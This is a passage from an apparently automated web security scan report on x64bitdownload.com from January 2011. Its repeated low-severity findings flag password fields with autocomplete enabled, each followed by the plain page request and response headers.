15.287. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.288. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76989


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.289. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.290. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.291. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.292. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.293. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.294. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.295. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.296. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.297. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81027


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.298. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.299. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.300. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.301. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86135


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.302. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.303. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.304. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.305. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
